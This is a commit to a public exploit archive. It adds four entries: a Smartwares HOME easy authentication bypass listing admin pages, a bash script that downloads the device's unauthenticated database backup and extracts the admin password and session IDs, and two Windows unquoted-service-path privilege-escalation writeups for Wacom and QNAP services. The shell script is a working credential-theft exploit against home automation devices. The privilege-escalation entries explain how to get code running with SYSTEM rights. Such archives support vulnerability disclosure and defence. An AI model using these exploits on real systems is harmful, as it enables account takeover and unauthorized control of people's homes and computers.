DB: 2019-11-07

4 changes to exploits/shellcodes Wacom WTabletService 6.6.7-3 - 'WTabletServicePro' Unquoted Service Path QNAP NetBak Replicator 4.5.6.0607 - 'QVssService' Unquoted Service Path Smartwares HOME easy 1.0.9 - Client-Side Authentication Bypass Smartwares HOME easy 1.0.9 - Database Backup Information Disclosure
2019-11-07 05:01:39 +00:00 · 2019-11-07 05:01:39 +00:00 · 97f133e755
commit 97f133e755
parent 52ab59aad8
5 changed files with 182 additions and 0 deletions
--- a/exploits/hardware/webapps/47595.txt
+++ b/exploits/hardware/webapps/47595.txt
@ -0,0 +1,33 @@
 # Exploit Title: Smartwares HOME easy 1.0.9 - Client-Side Authentication Bypass
 # Author: LiquidWorm
 # Date: 2019-11-05
 # Vendor: Smartwares
 # Product web page: https://www.smartwares.eu
 # Affected version: <=1.0.9
 # Advisory ID: ZSL-2019-5540
 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5540.php
 # CVE: N/A
 Summary: Home Easy/Smartwares are a range of products designed to remotely
 control your home using wireless technology. Home Easy/Smartwares is very
 simple to set up and allows you to operate your electrical equipment like
 lighting, appliances, heating etc.
 Desc: HOME easy suffers from information disclosure and client-side authentication
 bypass vulnerability through IDOR by navigating to several administrative web pages.
 This allowed disclosing an SQLite3 database file and location. Other functionalities
 are also accessible by disabling JavaScript in your browser, bypassing the client-side
 validation and redirection.
 Tested on: Boa/0.94.13
 /web-en/task.html
 /web-en/action_task.html
 /web-en/plan_task.html
 /web-en/room.html
 /web-en/room_set.html
 /web-en/room_set2.html
 /web-en/scene.html
 /web-en/scene_set.html
 /web-en/scene_set2.html
 /web-en/system.html
--- a/exploits/hardware/webapps/47596.sh
+++ b/exploits/hardware/webapps/47596.sh
@ -0,0 +1,62 @@
 # Title: Smartwares HOME easy 1.0.9 - Database Backup Information Disclosure
 # Author: LiquidWorm
 # Date: 2019-11-05
 # Vendor: Smartwares
 # Product web page: https://www.smartwares.eu
 # Affected version: <=1.0.9
 # Advisory ID: ZSL-2019-5541
 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5541.php
 # CVE: N/A
 # Summary: Home Easy/Smartwares are a range of products designed to remotely
 # control your home using wireless technology. Home Easy/Smartwares is very
 # simple to set up and allows you to operate your electrical equipment like
 # lighting, appliances, heating etc.
 #
 # Desc: The home automation solution is vulnerable to unauthenticated database
 # backup download and information disclosure vulnerability. This can enable the
 # attacker to disclose sensitive and clear-text information resulting in authentication
 # bypass, session hijacking and full system control.
 #!/bin/bash
 #
 # ==============================================================================
 # root@kali:~/homeeasy# ./he_info.sh http://192.168.1.177:8004
 # Target: http://192.168.1.177:8004
 # Filename: 192.168.1.177:8004-16072019-db.sqlite
 # Username: admin
 # Password: s3cr3tP4ssw0rd
 # Version: 1.0.9
 # Sessions: 
 # ------------------------------------------------------------------
 # * Ft5Mkgr5i9ywVrRH4mAECSaNJkTp5oiC0fpbuIgDIFbE83f3hGGKzIyb3krXHBsy
 # * Gcea4Ald4PlVGkOh23mIohGq2Da6h4mX0A8ibkm7by3QSI8TLmuaubrvGABWvWMJ
 # * JFU4zpdhuN4RTYgvvAhKQKqnQSvc8MAJ0nMTLYb8F6YzV7WjHe4qYlMH6aSdOlN9
 # * VtOqw37a12jPdJH3hJ5E9qrc3I4YY1aU0PmIRkSJecAqMak4TpzTORWIs1zsRInd
 # * flR4VjFmDBSiaTmXSYQxf4CdtMT3OQxV0pQ1zwfe98niSI9LIYcO3F2nsUpiDVeH
 # * rCfrAvnfnl6BsLjF9FjBoNgPgvqSptcH0i9yMwN3QSDbwNHwu19ROoAVSROamRRk
 # ------------------------------------------------------------------
 # ==============================================================================
 if [ "$#" -ne 1 ]; then
    echo "Usage: $0 http://ip:port"
    exit 0
 fi
 TARGET=$1
 CHECK=$(curl -Is $TARGET/data.dat 2>/dev/null | head -1 | awk -F" " '{print $2}')
 if [[ "$?" = "7" ]] || [[ $CHECK != "200" ]]; then
    echo "No juice."
    exit 1
 fi
 echo "Target: "$TARGET
 FNAME=${TARGET:7}-$(date +"%d%m%Y")
 curl -s $TARGET/data.dat -o $FNAME-db.sqlite
 echo "Filename: $FNAME-db.sqlite"
 echo "Username: "$(sqlite3 $FNAME-db.sqlite "select usrname from usr") # default: admin
 echo "Password: "$(sqlite3 $FNAME-db.sqlite "select usrpassword from usr") # default: 111111
 echo "Version: "$(sqlite3 $FNAME-db.sqlite "select option_value1 from option LIMIT 1 OFFSET 3")
 echo -ne "Sessions: \n"
 printf "%0.s-" {1..66}
 printf "\n"
 sqlite3 $FNAME-db.sqlite "select sessionid from sessiontable" | xargs -L1 echo "*"
 printf "%0.s-" {1..66} ; printf "\n\n"
--- a/exploits/windows/local/47593.txt
+++ b/exploits/windows/local/47593.txt
@ -0,0 +1,31 @@
 # Exploit Title: Wacom WTabletService 6.6.7-3 - 'WTabletServicePro' Unquoted Service Path
 # Discovery by: Marcos Antonio León (psk)
 # Discovery Date: 2019-11-04
 # Vendor Homepage: https://www.wacom.com
 # Software Link : http://cdn.wacom.com/U/drivers/IBMPC/pro/WacomTablet_637-3.exe
 # Tested Version: 6.3.7.3
 # Vulnerability Type: Unquoted Service Path
 # Tested on OS: Windows 10 Home x64 es
 # Step to discover Unquoted Service Path:
 C:\>sc qc WTabletServicePro
 [SC] QueryServiceConfig CORRECTO
 NOMBRE_SERVICIO: WTabletServicePro
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
        GRUPO_ORDEN_CARGA  : PlugPlay
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Wacom Professional Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
 #Exploit:
 A successful attempt would require the local attacker must insert an
 executable file in the path of the service. Upon service restart or
 system reboot, the malicious code will be run with elevated
 privileges.
--- a/exploits/windows/local/47594.txt
+++ b/exploits/windows/local/47594.txt
@ -0,0 +1,52 @@
 # Exploit Title: QNAP NetBak Replicator 4.5.6.0607 - 'QVssService' Unquoted Service Path
 # Discovery Date: 2019-11-05
 # Exploit Author: Ivan Marmolejo
 # Vendor Homepage: https://www.qnap.com/en/ 
 # Software Link: https://www.qnap.com/en/download
 # Version: 4.5.6.0607
 # Vulnerability Type: Local
 # Tested on: Windows XP Profesional Español SP3
 #Exploit
 ##############################################################################################################################################
 Summary:  QNAP NetBak Replicator provides several options for copying files from your Windows computer to your NAS. By simplifying the backup 
 process, NetBak Replicator helps ensure that your files are safe even when your computer becomes unavailable.
 Description:    The application suffers from an unquoted search path issue impacting the service 'QVssService'. This could potentially allow an 
 authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require 
 the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could 
 potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges
 of the application.
 ##############################################################################################################################################
 Step to discover the unquoted Service:
 C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
 QNAP Vss Service            QVssService               C:\Archivos de programa\QNAP\NetBak\QVssService.exe 		                 Auto
 ##############################################################################################################################################
 Service info:
 C:\Users\user>sc qc QVssService
 [SC] QueryServiceConfig SUCCESS
 SERVICE_NAME: QVssService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Archivos de programa\QNAP\NetBak\QVssService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : QNAP Vss Service
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem
 ##############################################################################################################################################
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10752,6 +10752,8 @@ id,file,description,date,author,type,platform,port
 47580,exploits/linux/local/47580.rb,"Micro Focus (HPE) Data Protector - SUID Privilege Escalation (Metasploit)",2019-11-04,Metasploit,local,linux,
 47582,exploits/windows/local/47582.txt,"Blue Stacks App Player 2.4.44.62.57 - _BstHdLogRotatorSvc_ Unquote Service Path",2019-11-05,"Diego Armando Buztamante Rico",local,windows,
 47584,exploits/windows/local/47584.txt,"Network Inventory Advisor 5.0.26.0 - 'niaservice' Unquoted Service Path",2019-11-05,"Samuel DiazL",local,windows,
 47593,exploits/windows/local/47593.txt,"Wacom WTabletService 6.6.7-3 - 'WTabletServicePro' Unquoted Service Path",2019-11-06,"Marcos Antonio León",local,windows,
 47594,exploits/windows/local/47594.txt,"QNAP NetBak Replicator 4.5.6.0607 - 'QVssService' Unquoted Service Path",2019-11-06,"Ivan Marmolejo",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -41909,3 +41911,5 @@ id,file,description,date,author,type,platform,port
 47587,exploits/php/webapps/47587.txt,"html5_snmp 1.11 - 'Remark' Persistent Cross-Site Scripting",2019-11-05,cakes,webapps,php,80
 47588,exploits/php/webapps/47588.txt,"html5_snmp 1.11 - 'Router_ID' SQL Injection",2019-11-05,cakes,webapps,php,80
 47589,exploits/aspx/webapps/47589.txt,"SD.NET RIM 4.7.3c - 'idtyp' SQL Injection",2019-11-05,"Fabian Mosch_ Nick Theisinger",webapps,aspx,80
 47595,exploits/hardware/webapps/47595.txt,"Smartwares HOME easy 1.0.9 - Client-Side Authentication Bypass",2019-11-06,LiquidWorm,webapps,hardware,
 47596,exploits/hardware/webapps/47596.sh,"Smartwares HOME easy 1.0.9 - Database Backup Information Disclosure",2019-11-06,LiquidWorm,webapps,hardware,